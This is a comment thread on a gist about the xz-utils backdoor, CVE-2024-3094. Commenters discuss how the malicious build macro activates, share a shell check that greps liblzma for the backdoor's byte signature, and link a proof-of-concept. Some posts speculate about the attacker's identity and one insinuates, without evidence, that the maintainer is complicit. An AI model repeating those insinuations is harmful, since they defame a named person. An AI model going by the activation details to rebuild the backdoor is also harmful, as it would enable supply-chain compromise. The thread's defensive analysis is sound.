@AdrianBunk Thanks. I will reflect on if this should be included. It's hard because I do not want to encourage a witch hunt and it's mentioned in some references I included. If you have a suggestion for how I could include it without it sounding accusatory, then that would be helpful.

EDIT: Maybe I could mention it in the context of when the IFUNC stuff got introduced.

@thesamesam

https://github.com/hansjans162
Some token activity elsewhere around the xz pull request, and then never seen again.

In Debian it was nearly 2 years later not only this one (and only) bug report requesting the upgrade to 5.6.1, a few days earlier this "person" also created a (now blocked) new user in the Debian git that had the same pattern of some token activity in other projects while also pushing the upgrade to 5.6.1 right after creating the account:
https://web.archive.org/web/20240330080632/https://salsa.debian.org/hjansen
https://salsa.debian.org/debian/xz-utils/-/merge_requests/1

Can you find any other traces of this "person"?

(EDIT: restored after mistakenly "Update comment" instead of a new comment for my next one)

@thesamesam
Copy link
Author

thesamesam commented Apr 1, 2024

@AdrianBunk The only thing I've seen pointed out is https://marc.info/?w=2&r=1&s=hans+jensen&q=a but when I took a brief look, it looked like they were not the same person. I will of course keep an eye out...

EDIT: Note that xz-devel is not currently on marc, but I believe the marc people want to get it imported. I should also say questions are welcome - feel free to keep throwing them. I can't reply to every single one, especially if they're more.. out there, but yours have been totally fine & worth answering.

@gh-markt
Copy link

gh-markt commented Apr 1, 2024

Has anyone documented how this exploit may be done without systemd?

@thesamesam
Copy link
Author

thesamesam commented Apr 1, 2024

@gh-markt I'm going to update the gist on this today, but TL;DR: all suggested paths I've seen wouldn't work AFAIK because they rely on PAM modules which load too late.

(Of course, if the payload were different, that would be another story, but talking about what we have.)

@AdrianBunk
Copy link

Immediately after 5.6.1 was due to the pushing by "Hans Jansen " in Debian unstable, "Jia Tan" requested a freeze exception in Ubuntu so that it gets into the upcoming LTS (that should be released later this month):
https://tracker.debian.org/news/1515323/accepted-xz-utils-561-1-source-into-unstable/
https://bugs.launchpad.net/ubuntu/+source/xz-utils/+bug/2059417

@makotom
Copy link

makotom commented Apr 1, 2024

In case this makes any bit of help somehow: https://twitter.com/m61k/status/1774614747553620478
tl;dr - I didn't see the if clause (pasting it below for convenience) as a clue that it targets only glibc-based systems on AMD64, unlike the explanation in the Design section.

if ! (echo "$build" | grep -Eq "^x86_64" > /dev/null 2>&1) && (echo "$build" | grep -Eq "linux-gnu$" > /dev/null 2>&1);then

Apologies if it's a false alarm!

@Artoria2e5
Copy link

Artoria2e5 commented Apr 1, 2024

@makotom Hm. Indeed. The build variable is extracted through eval $(grep ^build=\'x86_64 config.status) (backticks replaced with $(), because i can't markdown), so we should ask autoconf about it.

In autoconf, build is what the --build option eventually gets set to (check general.m4, there's a bit that says build=$build_alias later). The --build option is "the machine you are building on", defaulting to whatever config.guess finds.


now the if line. let's replace the grep with just (true) and (false), so we can find that the expression is the same as

if (! (something ^x86_64)) && (something linux-gnu$); then

There is an illusion of choice here: recall that grep ^build=\'x86_64 config.status above means if build is ever set, it has to start with x86_64. so we have three possibilities:

  1. build is not set, because build machine is not x86_64. both parts are false, so true && false is false... no exit.
  2. build is x86_64somethinglinux-gnu. first part is true, second part is true. with negation, we get false && true... no exit.
  3. build is x86_64, but does not end with linux-gnu. first true, second false, exit.

... what? none of this makes sense. Considering the bad version of the crc code is supposed to be only x86_64, we should have seen loads of issues when people compile on a non-x64 machine. or when they cross compile. Maybe something else down the line prevents the wrong-architecture object from being linked?


Yikes, we have two scripts in one, the top-level if and the elif. The if is the part that does things to the Makefile, the elif is the part that does stuff to objects.

Maybe the $CC invocation will detect the architecture mismatch, and 2>/dev/null successfully handles it, so there's no issue with cross compile? (Would still go bonkers at runtime for when host is either (x64 && glibc) or (non-x64), target is (x64 && !glibc), but that's probably too rare.)

I don't know.

@x1done
Copy link

x1done commented Apr 1, 2024

@x1done

@ItzSwirlz I can not think of any of the +800 countries, such as CN/SG/MY, use daylight saving time, and it can't be +300.

Lasse is living in Finland (like me). +0300 is Finnish summer time.

It is obvious that it was Lasse who applied these patches/commit, including ones that were written by the attacker.

@AdrianBunk Sorry, as mentioned I am not familiar with coding, so I might be wrong. And I don't want to spam the thread. However, I believe we shouldn't ignore anything "suspicious" as it might lead us to what had happened, unless we can reproduce it or are confident enough to rule out its suspicious nature.

It is obvious that it was Lasse who applied these patches/commit, including ones that were written by the attacker. --> Are we confident your theory can explain the following? "Jia Tan" authored with a +0300 timezone and "Jia Tan" committed with a +0800 timezone? Note - it was commited by account "Jia Tan" with +0800 timezone, not Lasse with +300 timezone.

commit 3d1fdddf92321b516d55651888b9c669e254634e
Author:     Jia Tan <jiat0218@gmail.com>
AuthorDate: Tue Jun 27 17:27:09 2023 +0300
Commit:     Jia Tan <jiat0218@gmail.com>
CommitDate: Tue Jun 27 23:56:06 2023 +0800

@viccie30
Copy link

viccie30 commented Apr 1, 2024

Lennart Poettering's remarks about libselinux linking liblzma are apparently true, but that dependency is apparently an error: https://www.openwall.com/lists/oss-security/2024/03/31/12

@thesamesam
Copy link
Author

thesamesam commented Apr 1, 2024

@viccie30 Someone else has just pointed this out to me - thanks to both of you. I'll update things shortly.

Really pleased to have this clarification, as it made little sense to me until now, as I couldn't find a trace of liblzma/xz in libselinux (I only grepped the latest tarball & used gh search though, didn't go so far as cloning their repo and grepping history). It was on my list to look into.

@viccie30
Copy link

viccie30 commented Apr 1, 2024

@x1done

@ItzSwirlz I can not think of any of the +800 countries, such as CN/SG/MY, use daylight saving time, and it can't be +300.

Lasse is living in Finland (like me). +0300 is Finnish summer time.
It is obvious that it was Lasse who applied these patches/commit, including ones that were written by the attacker.

@AdrianBunk Sorry, as mentioned I am not familiar with coding, so I might be wrong. And I don't want to spam the thread. However, I believe we shouldn't ignore anything "suspicious" as it might lead us to what had happened, unless we can reproduce it or are confident enough to rule out its suspicious nature.

It is obvious that it was Lasse who applied these patches/commit, including ones that were written by the attacker. --> Are we confident your theory can explain the following? "Jia Tan" authored with a +0300 timezone and "Jia Tan" committed with a +0800 timezone? Note - it was commited by account "Jia Tan" with +0800 timezone, not Lasse with +300 timezone.

commit 3d1fdddf92321b516d55651888b9c669e254634e
Author:     Jia Tan <jiat0218@gmail.com>
AuthorDate: Tue Jun 27 17:27:09 2023 +0300
Commit:     Jia Tan <jiat0218@gmail.com>
CommitDate: Tue Jun 27 23:56:06 2023 +0800

Anyone can put whatever name, date, or message they want in a commit. I can push a commit made 2 years in the future in a different timezone authored by Henry Kissinger and committed 3 years ago by Pol Pot if I want to.

@AdrianBunk
Copy link

@x1done

@ItzSwirlz I can not think of any of the +800 countries, such as CN/SG/MY, use daylight saving time, and it can't be +300.

Lasse is living in Finland (like me). +0300 is Finnish summer time.
It is obvious that it was Lasse who applied these patches/commit, including ones that were written by the attacker.

@AdrianBunk Sorry, as mentioned I am not familiar with coding, so I might be wrong. And I don't want to spam the thread. However, I believe we shouldn't ignore anything "suspicious" as it might lead us to what had happened, unless we can reproduce it or are confident enough to rule out its suspicious nature.

@x1done Everyone in this discussion except you agrees that this is not suspicious, why are you wating everyones time by spamming this thread with repeating the same again and again and again and again?

@x1done
Copy link

x1done commented Apr 1, 2024

Anyone can put whatever name, date, or message they want in a commit. I can push a commit made 2 years in the future in a different timezone authored by Henry Kissinger and committed 3 years ago by Pol Pot if I want to.

@viccie30 good, technically one can. but then what's the point Jia Tan deliberately changing his timezone to +300 before his commit? It doesn't make sense to me, especially considering that he was using +800 most of the time.

@AdrianBunk
Copy link

@viccie30 good, technically one can. but then what's the point Jia Tan deliberately changing his timezone to +300 before his commit? It doesn't make sense to me, especially considering that he was using +800 most of the time.

@x1done This has already been explained to you multiple times.

Everyone else in this thread would really appreciate if you could just shut up.

@cwegener
Copy link

cwegener commented Apr 1, 2024 via email

@redcode
Copy link

redcode commented Apr 1, 2024

The AuthorDate is supposed to be the original date the commit was created, which is usually equal to CommitDate unless you do an amend, force push or rebase, right? So, if the weird timezone was in CommitDate we could conclude that one of those things has happened. The problem is that the one with the suspicious timezone is AuthorDate, that is, the original one, the one that supposedly reflects when Jia Tan created the commit. Am I wrong?

@redcode
Copy link

redcode commented Apr 1, 2024

It looks suspicious to me at the very least. It looks like evidence that Jia Tan was actually located at a +3 zone, not +8, and that he created that commit with his real timezone (maybe he forgot to use --date to alter the date, or maybe he used another computer or user account where he would have the correct timezone). Something might have happened with that commit, and he tried to fix it, this time using the fake time zone.

@AdrianBunk
Copy link

@redcode Please stop trying to restart discussing a topic that has already been discussed far too long.

Please read https://gist.github.com/thesamesam/223949d5a074ebc3dce9ee78baad9e27?permalink_comment_id=5007548#gistcomment-5007548 and other posts in this thread that explain why this is not suspicious.

@duracell
Copy link

duracell commented Apr 1, 2024

It looks suspicious to me at the very least.

Or it's the thing others already posted. Which is much more likely, because it's exactly what happens if you do rebase or other things, which fits perfectly in the complete process. So if there is no evidence for anything, why would you bring this up? (It's a rhetorical question, please do NOT answer!)

@redcode
Copy link

redcode commented Apr 1, 2024

@redcode Please stop trying to restart discussing a topic that has already been discussed far too long.

Please read https://gist.github.com/thesamesam/223949d5a074ebc3dce9ee78baad9e27?permalink_comment_id=5007548#gistcomment-5007548 and other posts in this thread that explain why this is not suspicious.

Have you tried what you have posted? because --ignore-date should fake AuthorDate by setting it to CommitDate. Or at least that's what the documentation says.

And why this insistence on not taking into account this issue? It seems completely normal to me that a hacker would try to fake the time zone. BTW, I am NOT accusing Lasse Collin of being Jia Tan.

@AdrianBunk
Copy link

Have you tried what you have posted?

Yes.

Feel free to try yourself, but please stop posting.

@redcode
Copy link

redcode commented Apr 1, 2024

Have you tried what you have posted?

Yes.

Feel free to try yourself, but please stop posting.

OK, I've done it, using 2 machines. The 1st one with GMT+0, and the 2nd one with GMT+2, where I've applied the patches with git am. And, as the documentation says, AuthorDate has been replaced by CommitDate:

imagen

@tiaotiao97
Copy link

Hi, I want to test the checking script effected. I downloaded the backdoor version in centos8, then ran "./autogen.sh", "./configure", "make", "make install" by step, and I found "liblzma.so.5.6.0" in /usr/local/lib/. And I executed <hexdump -ve '1/1 "%.2x"' /usr/local/lib/liblzma.so.5.6.0 | grep f30f1efa554889f54c89ce5389fb81e7000000804883ec28488954241848894c2410>. But it not work, I cannot find this function signature in so file. What's Problem? Thanks.

@Leseratte10
Copy link

The backdoor is only applied when building DEB or RPM packages, it's not applied when building locally / without packaging.

@jmakovicka
Copy link

Also, autogen will likely overwrite the backdoored files with clean versions. You need to run configure only.

@zacanger
Copy link

zacanger commented Apr 1, 2024

@redcode I don't think anyone's trying to be dismissive of something that's worthwhile. I'm sure people do fake their timezones, but there are so many possibilities for how that would happen that this doesn't seem like a useful path to go down (like using git-am, except for once, or trying Codespaces in Firefox with resistfingerprinting on, or travelling, or using a spare computer set to a different timezone, or all kinds of things).

If you (or anyone else) is interested in exploring that, no one's forcing you not to, just please don't keep posting about it unless you find something genuinely useful. This thread probably has a lot of followers now, and many are getting emails for every comment posted. It's a lot of noise about something that doesn't seem to be all that useful.

@tiaotiao97
Copy link

The backdoor is only applied when building DEB or RPM packages, it's not applied when building locally / without packaging.

Thank u. Can rpmbiuld tool apply this case?

@tiaotiao97
Copy link

Also, autogen will likely overwrite the backdoored files with clean versions. You need to run configure only.

Hello, I don't find configure script in source code😂, so I genarete it by autogen. How can I run configure directly?

@thesamesam
Copy link
Author

The malicious version of the macro is only in the release tarball. If you see no configure script, it's not a release tarball, and the bad macro wasn't there to begin with.

@tiaotiao97
Copy link

The malicious version of the macro is only in the release tarball. If you see no configure script, it's not a release tarball, and the bad macro wasn't there to begin with.

I'll try again. Thank u :)

@thesamesam
Copy link
Author

I'm slowly building up a git repo with all the release tarballs but I keep getting distracted. I'll add it to the gist when it's done.

@flyingcakes85
Copy link

Have we heard anything from Jia Tan after the backdoor was discovered? From what I gather, he was reasonably active and conversing with maintainers of distribution packagers. Has he not emailed any maintainer or used IRC after 29 March?

@thesamesam
Copy link
Author

@flyingcakes85 AFAIK no. But Lasse did mention since this started that he also wasn't expecting to hear anything as both of them had planned to be offline over easter.

@thesamesam
Copy link
Author

thesamesam commented Apr 1, 2024

@lazka
Copy link

lazka commented Apr 1, 2024

The 5.6.0 tarball (not the case with 5.6.1) has various files, such as the test files and some binary test files, with updated mtimes right before autogen.sh was called, which seems like it might have been by mistake. Maybe something to look into.

And the tarball was likely created with Arch Linux, since Arch ships a git version of libtool, and that matches: 2.4.7.4-1ec8f-dirty. In case someone wants to re-create the tarball from git for comparison.

@WaaromZoMoeilijk
Copy link

WaaromZoMoeilijk commented Apr 1, 2024

Can someone help me understand what we ought to do with liblzma opposed to downgrading xz-utils itself?
It seems my script will downgrade xz-utils just fine but liblzma stays on current distro version, would love some input on this as I'm quite sure we'd need to downgrade this one as well but I'm not really sure to which version.

https://github.com/WaaromZoMoeilijk/Security/blob/main/CVE-2024-3094.sh

@erinacio
Copy link

erinacio commented Apr 1, 2024

Can someone help me understand what we ought to do with liblzma opposed to downgrading xz-utils itself? It seems my script will downgrade xz-utils just fine but liblzma stays on current distro version, would love some input on this as I'm quite sure we'd need to downgrade this one as well but I'm not really sure to which version.

https://github.com/WaaromZoMoeilijk/Security/blob/main/CVE-2024-3094.sh

The actual backdoor payload is in liblzma. When it's dynamically linked with /usr/sbin/sshd (through indirect dependency introduced by libsystemd, with some specific preconditions checked inside the payload) it will intercept some libcrypto functions (direct dependency of sshd).

@fungilife
Copy link

thesamesam:

easter

For those pointing fingers to geography and ethnicity, need I remind them that this holiday is observed by western christian religions/geographies, catholics/protestants etc, not eastern (from Siberia to East Africa), nor hindus, budhists, jews, or muslims.
Orthodox related easter holidays are late April.

I have been a long term fan of xz and hate to bash it even more, but the possibility of the two contributors being one and the same appears to have escaped nearly everyone here.
Tarballs have been signed by this "entity" as versions pretty far back, further than some people seem to perceive as "safe" versions.

I apologize if some of you feel this observation is useless.

@marco-silva0000
Copy link

@fungilife It would be clear by now if their commit behaviours would match in anyway, github's ban doesn't help, but I don't think the schedules match up at all.

unless you have any data backed observations, I do think your observation is useless. I suggest you gather up some data on public holidays and match it up with both people, the analysis needs to be done first.

@AdrianBunk
Copy link

@fungilife

easter

Sam did not even say "due to easter", it might just have been "I will also be away next weekend".

For those pointing fingers to geography and ethnicity, need I remind them that this holiday is observed by western christian religions/geographies, catholics/protestants etc, not eastern (from Siberia to East Africa), nor hindus, budhists, jews, or muslims. Orthodox related easter holidays are late April.

You are pretty fast at presenting incorrect conclusions as facts.

South Korea is home to more than 13 million Christians (Catholics and Protestants).

Hong Kong and Taiwan are both in the timezone the attacker used, and each of them is home to one million Christians who observe Easter at the Western Christian date.

Even if you assume that the +0800 timezone is correct and that the attacker is a Christian observing the Western Easter date, that leaves 2 million people.

It is also possible that the attacker is located somewhere in Europe, the timezone might or might not be faked.

I have been a long term fan of xz and hate to bash it even more, but the possibility of the two contributors being one and the same appears to have escaped nearly everyone here.

This possibility is something everyone has in mind, but everything that is known so far is a strong indication that these are separate people and that Lasse is a victim.

As an example, the first step being in build-to-host.m4 which is a file that is not (and should not be) in git strongly looks like an attempt by "Jia Tan" to hide the change from Lasse.
Someone else noticing the manipulation in build-to-host.m4 that can be compared with the original file in gnulib is actually far more likely than hiding a manipulation in the autoconf macros Lasse wrote earlier, without another maintainer who could ask questions the exploit might have started there.

Tarballs have been signed by this "entity" as versions pretty far back, further than some people seem to perceive as "safe" versions.

I apologize if some of you feel this observation is useless.

You should perhaps apologize to Lasse for such public slander that is not backed up by anthing.

@WaaromZoMoeilijk
Copy link

Can someone help me understand what we ought to do with liblzma opposed to downgrading xz-utils itself? It seems my script will downgrade xz-utils just fine but liblzma stays on current distro version, would love some input on this as I'm quite sure we'd need to downgrade this one as well but I'm not really sure to which version.
https://github.com/WaaromZoMoeilijk/Security/blob/main/CVE-2024-3094.sh

The actual backdoor payload is in liblzma. When it's dynamically linked with /usr/sbin/sshd (through indirect dependency introduced by libsystemd, with some specific preconditions checked inside the payload) it will intercept some libcrypto functions (direct dependency of sshd).

Thank you, so its not even as straight forward as some articles have claimed to just downgrade just xz-utils.
Would you or anyone know if the snippit below would detect this in a reliable way and how to extract the proper hexdump signature?

LZMAPATH="$(ldd $(which sshd) | grep liblzma | grep -o '/[^ ]*')" # find path to liblzma used by sshd

# check if liblzma is used by sshd by @Vegard Nossum
if [ "$LZMAPATH" == "" ]
then
	echo "Probably not vulnerable based on missing liblzma used by sshd"
fi

# check for malicous function signature by @Vegard Nossum
if hexdump -ve '1/1 "%.2x"' "$LZMAPATH" | grep -q f30f1efa554889f54c89ce5389fb81e7000000804883ec28488954241848894c2410
then
	echo "Probably vulnerable based on signature hexdump"
else
	echo "Probably not vulnerable based on signature hexdump"
fi

@thijskh
Copy link

thijskh commented Apr 1, 2024

@thesamesam Small correction: the gist mentions Hans Jensen (2x) but the actual (assumed) name is Hans Jansen

@pillowtrucker
Copy link

JIA CHEONG TAN
CIA JHEONG TAN
CIA JHON EGTAN
CIA JOHN AGENT
CIA AGENT JOHN
Case closed

@goyalyashpal
Copy link

JIA CHEONG TAN
CIA JHEONG TAN
CIA JHON EGTAN
CIA JOHN AGENT
CIA AGENT JOHN
Case closed

😲😱💯✨

@erinacio
Copy link

erinacio commented Apr 1, 2024

Can someone help me understand what we ought to do with liblzma opposed to downgrading xz-utils itself? It seems my script will downgrade xz-utils just fine but liblzma stays on current distro version, would love some input on this as I'm quite sure we'd need to downgrade this one as well but I'm not really sure to which version.
https://github.com/WaaromZoMoeilijk/Security/blob/main/CVE-2024-3094.sh

The actual backdoor payload is in liblzma. When it's dynamically linked with /usr/sbin/sshd (through indirect dependency introduced by libsystemd, with some specific preconditions checked inside the payload) it will intercept some libcrypto functions (direct dependency of sshd).

Thank you, so its not even as straight forward as some articles have claimed to just downgrade just xz-utils. Would you or anyone know if the snippit below would detect this in a reliable way and how to extract the proper hexdump signature?

LZMAPATH="$(ldd $(which sshd) | grep liblzma | grep -o '/[^ ]*')" # find path to liblzma used by sshd

# check if liblzma is used by sshd by @Vegard Nossum
if [ "$LZMAPATH" == "" ]
then
	echo "Probably not vulnerable based on missing liblzma used by sshd"
fi

# check for malicous function signature by @Vegard Nossum
if hexdump -ve '1/1 "%.2x"' "$LZMAPATH" | grep -q f30f1efa554889f54c89ce5389fb81e7000000804883ec28488954241848894c2410
then
	echo "Probably vulnerable based on signature hexdump"
else
	echo "Probably not vulnerable based on signature hexdump"
fi

The script looks legitimate as long as the hexdump is correct, and it's possibly the most widely spread script that could already be used by many. However, I would suggest against relying on such script if you can't figure out how it works on your own.

If your xz/lzma comes from the distro repository, just follow the guide published by the distro you use. For example, if you're using Debian and the xz/liblzma is installed from the official repository (or any of its mirrors), you can follow the Debian Security Advisory. For RHEL and Fedora users, this post from Red Hat should help.

If your distro don't publish such security guides (could be as simple as a tweet/toot/whatever, but must be informative), I would personally suggest you move to a more responsible distro.

If you build packages on your own and can't figure out if you're affected or not, I would personally suggest you switch to distro-provided packages as distro maintainers are more proficient at figuring out what to do and provide necessary guides to anyone who needs.

@marco-silva0000
Copy link

marco-silva0000 commented Apr 1, 2024

I've seen this being shared as a POC, can anyone confirm? https://github.com/amlweems/xzbot

@fungilife
Copy link

... or one hell of an April fools joke brewing for many days now ... and many nights of rebuilding everything we have

@ostrosablin
Copy link

There's one question that's still bothering me, even after looking through various preliminary reverse engineering reports so far. Is there any understanding, where does backdoor spend ~0.5 seconds?

That's quite a lot of time for modern CPU. Even though backdoor uses sophisticated obfuscation, the logic reversed so far doesn't seem to involve any heavy number crunching. And considering that slowdown applies even when sshd is started with "-h", there isn't even cryptography involved.

@iustin
Copy link

iustin commented Apr 1, 2024

There's one question that's still bothering me, even after looking through various preliminary reverse engineering reports so far. Is there any understanding, where does backdoor spend ~0.5 seconds?

That's quite a lot of time for modern CPU. Even though backdoor uses sophisticated obfuscation, the logic reversed so far doesn't seem to involve any heavy number crunching. And considering that slowdown applies even when sshd is started with "-h", there isn't even cryptography involved.

I've been only passively watching this thread since it has a lot of non-technical craziness in it, but indeed this is a point that bothered me as well. 500ms is really, really a lot, especially for compiled code.

I find it somewhat strange that someone/some group that clearly has a lot of know-how based on how real-looking the commits that introduce the backdoor are, but not being able to make this half-invisible for anyone that is not debugging this knowing already what to look for. Almost as if the person in charge for launching the back door had different knowledge/standards than the person introducing it.

Well, will be a good read once the dust settles.

@Cicada2024
Copy link

There's one question that's still bothering me, even after looking through various preliminary reverse engineering reports so far. Is there any understanding, where does backdoor spend ~0.5 seconds?
That's quite a lot of time for modern CPU. Even though backdoor uses sophisticated obfuscation, the logic reversed so far doesn't seem to involve any heavy number crunching. And considering that slowdown applies even when sshd is started with "-h", there isn't even cryptography involved.

I've been only passively watching this thread since it has a lot of non-technical craziness in it, but indeed this is a point that bothered me as well. 500ms is really, really a lot, especially for compiled code.

I find it somewhat strange that someone/some group that clearly has a lot of know-how based on how real-looking the commits that introduce the backdoor are, but not being able to make this half-invisible for anyone that is not debugging this knowing already what to look for. Almost as if the person in charge for launching the back door had different knowledge/standards than the person introducing it.

Well, will be a good read once the dust settles.

Same reason as people who know they should make some information half invisible to anyone debugging their backdoor at times still choose to converse about it in public forums because they think no one will understand the convo without insider information. Everyone has lapses and get sloppy at times, Jia Tan is just a person like we all.

@ve2tmq
Copy link

ve2tmq commented Apr 1, 2024

JIA CHEONG TAN CIA JHEONG TAN CIA JHON EGTAN CIA JOHN AGENT CIA AGENT JOHN Case closed

pub (4)rsa4096/22d465f2b4c173803b20c6de59fcf207fea7f445 2022-12-28T15:23:29Z

uid Jia Tan jiat0218@gmail.com
sig sig 59fcf207fea7f445 2022-12-28T15:23:29Z 2027-12-27T15:23:29Z ____________________ [selfsig]
sig sig 38ee757d69184620 2024-01-12T19:12:25Z ____________________ ____________________ 38ee757d69184620

sub (4)rsa4096/63fcf405bbe267a235a3537e63cce556c94dda4f 2022-12-28T15:23:29Z
sig sbind 59fcf207fea7f445 2022-12-28T15:23:29Z ____________________ 2027-12-27T15:23:29Z []

@gh-markt
Copy link

gh-markt commented Apr 1, 2024

y'know, even downgrading xz-utils to an earlier version isn't viable if you were grabbing the source from github and compiling it oneself. The only downgrade path that exists is if you still have a compiled older version hanging around. Not everyone is tied to particular "distributions".

@donington
Copy link

This is a great resource and references most of the stuff I've found researching this myself so far. Great stuff.

I found a repo earlier by user @amlweems that has a very interesting write-up and project where he is prodding the payload called xzbot, where he has done some reverse engineering on it. Seems to heavily imply that this was supposed to be RCE when receiving a specific ED448 key payload.

There's one question that's still bothering me, even after looking through various preliminary reverse engineering reports so far. Is there any understanding, where does backdoor spend ~0.5 seconds?

This is just speculation on my part, but maybe waiting and scanning for detection of the key was part of why it caused such a delay in the sshd login process.

@x1done
Copy link

x1done commented Apr 1, 2024

thesamesam:

easter

For those pointing fingers to geography and ethnicity, need I remind them that this holiday is observed by western christian religions/geographies, catholics/protestants etc, not eastern (from Siberia to East Africa), nor hindus, budhists, jews, or muslims. Orthodox related easter holidays are late April.

I have been a long term fan of xz and hate to bash it even more, but the possibility of the two contributors being one and the same appears to have escaped nearly everyone here. Tarballs have been signed by this "entity" as versions pretty far back, further than some people seem to perceive as "safe" versions.

I apologize if some of you feel this observation is useless.

Your observation is not useless.

I have found some commit logs indicating Jia Tan from the +300 timezone as well, and @redcode had been testing it. However, we were asked by Mr @AdrianBunk and @cwegener to "shut up" and "stop posting here", regardless of the result of the test by @redcode (Mr @AdrianBunk was not interested in the test result at all - this is a red flag).

I went through all the comments from Mr @AdrianBunk and @cwegener. Interestingly enough, most of their comments were about China or timezone +800. Apparently, some people are not interested in the logs and what really happened.

At this stage, it is probably too early to speculate, but it is also not prudent to say anyone as innocent. I just would like to point out the following:

  • In real-life cases, an attacker will always try to hide their real trace. However, very often, they accidentally leak their real trace somewhere.

  • Let's consider it from an attacker's perspective. They would need expertise in developing xz, gain the trust of the owner to obtain maintainer access, and submit backdoors without being detected by other maintainers. What would be their success rate? Very low I believe. However, with the theory you mentioned, two maintainers being one person, the success rate becomes 100%.

@ve2tmq
Copy link

ve2tmq commented Apr 1, 2024

Who is Jia Tan?

I pass all my day as read thread about this "attack", because it's not a vulnerability, it's an "attack" against OpenSources community.

Modify code to inject payload from unittest "corrupted file", it's needs big knowledge. Target XZ when we know it's most usefull algorithme for compression and used directly in Linux kernel, this is not random.

Does it just one guy who worked near 3 years on this projet? I don't know...

Today, OpenSources, Linux, glibc, XZ are present on more than 80% of servers and IoT. We are in period of a lot of politicals threats. Russia vs Ukraine, Gaza vs Palestin, North Korea... is it spons from goverment? I don't know. It's just a probability.

This is a proof of solidarity of community.

Keep in mind, now source code could be target of threat in unstable world. 😢

@duracell
Copy link

duracell commented Apr 1, 2024

@x1done

I have found some commit logs indicating Jia Tan from the +300 timezone as well, and @redcode had been testing it. However, we were asked by Mr AdrianBunk and cwegener to "shut up" and "stop posting here", regardless of the result of the test by redcode (Mr AdrianBunk was not interested in the test result at all - this is a red flag).

Because you are not interested in the explanation and just posting the same thing over and over which is just wrong.

I went through all the comments from Mr @AdrianBunk and @cwegener. Interestingly enough, most of their comments were about China or timezone +800. Apparently, some people are not interested in the logs and what really happened.

Interestingly your account is brand new, and you're posting here the same stuff over and over again, besides it's obvious that the reason for this timezone is a patch, rebase, or other git operation. It's fine to post this finding once, but discuss it over and over without any need is just spam.
That's the reason why multiple people posted that you should stop spamming about and a lot more thinking the same.
If you want to discuss this, open a chat, repo, gist whatever for this specific topic, but PLEASE do not spam here without any useful information or proof.

@morpheby
Copy link

morpheby commented Apr 1, 2024

@x1done
FYI there is already a pretty good writeup about times, timezones, and nationalities: https://rheaeve.substack.com/p/xz-backdoor-times-damned-times-and

Unlike you, the author does not go into baseless accusations and slandering.

This FAQ is one of the best and up to date repository of known truths about xz attack. Stop making it into a speculations and conspiracy theories chatroom. Go somewhere else, please.

@christoofar
Copy link

y'know, even downgrading xz-utils to an earlier version isn't viable if you were grabbing the source from github and compiling it oneself. The only downgrade path that exists is if you still have a compiled older version hanging around. Not everyone is tied to particular "distributions".

The dreaded build_to_host.m4 is not on the origin repo because Jia nuked it in a .gitignore to be sneaky. Debian has it because it got it from upstream, they have their own git, and it's over there and they used it to bake the tarball and the package---which was the intended goal all along.

The tons of people direct-binding xz by baking liblzma.so never got the steps to extract out the .o payload so gcc could link it.

@x1done
Copy link

x1done commented Apr 1, 2024

@morpheby thank you for the link, that's an interesting analysis. i won't post anything more here (i am not a developer), since there is already the good writeup on the timezone analysis.

@n1x3n
Copy link

n1x3n commented Apr 1, 2024

There's one question that's still bothering me, even after looking through various preliminary reverse engineering reports so far. Is there any understanding, where does backdoor spend ~0.5 seconds?
That's quite a lot of time for modern CPU. Even though backdoor uses sophisticated obfuscation, the logic reversed so far doesn't seem to involve any heavy number crunching. And considering that slowdown applies even when sshd is started with "-h", there isn't even cryptography involved.

I've been only passively watching this thread since it has a lot of non-technical craziness in it, but indeed this is a point that bothered me as well. 500ms is really, really a lot, especially for compiled code.
I find it somewhat strange that someone/some group that clearly has a lot of know-how based on how real-looking the commits that introduce the backdoor are, but not being able to make this half-invisible for anyone that is not debugging this knowing already what to look for. Almost as if the person in charge for launching the back door had different knowledge/standards than the person introducing it.
Well, will be a good read once the dust settles.

Same reason as people who know they should make some information half invisible to anyone debugging their backdoor at times still choose to converse about it in public forums because they think no one will understand the convo without insider information. Everyone has lapses and get sloppy at times, Jia Tan is just a person like we all.

^== Is exactly this conversing about it in public forums? ;) (Sorry, just somehow got cicada-vibes because of your ~5hrs old account. :))

Anyways, as I understand from Andres Freunds message on oss-security, parsing the symbol tables in memory was the quite slow step in the malware code which made him initially look into that. Maybe that's where the ~0.5s are spent.

@christoofar
Copy link

christoofar commented Apr 1, 2024

A word bout Jia's commits to the base lib itself:

I have spent a good deal of my working career keeping high-level code going with C/C++ deplibs (and whole programs that take on a job step) that, once they've proven their mettle in production, nobody cares to touch. Sometimes re-writes are needed in the C source, but typically they are done with a good motivating reason.

Jia pumped out a shitstorm of commits and introduced two advertised features: RISCV support and multithread decomp. A shitton of his commits however are around moving to a modern buildstream from a project that followed the old pattern of C projects: the nasty autoconf, an even nastier Makefile, a patternless approach to tests, etc---and moving all that around in a big CMake refactor, tons of commits to change static-but-commented numbers and defines over to enums, .po ing the code everywhere, and whole moveouts and relocations of functionality (what Lasse put into file_io.c for sandbox, moving over to sandbox.c), etc.

It's just a lot of activity to be doing for what arguably are just not big features... and wouldn't you want to get the features out, at least the simple RISCV one that's mostly a copypasta job (which is what he did, look at the increment-assign statements where the arithmetic is written out without any comment, which is what Lasse did elsewhere earlier in the history) and then pull them back into a mega-cleanup-branch anyway?

I would think if you cared so much about readability of the top-line constants that you would give a shit about the meat-and-potatoes part of the code where there's whole stretches of uncommented bitmath.

I feel Lasse should just wipe out and rebase back to pre-Jia because so much trust is shaken by the autotools shenanigans that Jia's refactoring work should be thrown in the trash. I don't think he poisoned up the baselib, it's just part of the social engineering mainly to fool Lasse. If anything, a legit volunteer who wants to contribute now has a ready-done refactoring that can be examined line by line, day by day, and re-decided if it was worth it or Jia was just generating commit noise.

I guess for FOSS crews one lesson is this: Someone wants to onboard because feature X is not there? Great. Welcome to the team. Go henceforth and finish it in your own branch. Oh, you decided that the code is too ugly/puts out a storm of warnings and you prefer quiet compiles? Great! Another branch for you. Let's keep stable going and backport the commits to the cleanup branch! Wait... why do you need to screw around in the autotool scripts? Can we isolate that need to the specific feature commits involved so the commits that put on the feature also have the script changes, because ac scripts are a nightmare and delicate?

Sole-maintainer handing off to an anon-sole-maintainer? Well, what choice do the users have other than marking the last stable commit good and everything else sus until some trusted people come to do a drive-by vouch? All the people linking direct to the build thought they were being helpful busy beavers keeping their dependencies from going stale and risking compat problems didn't know what Jia was up to.

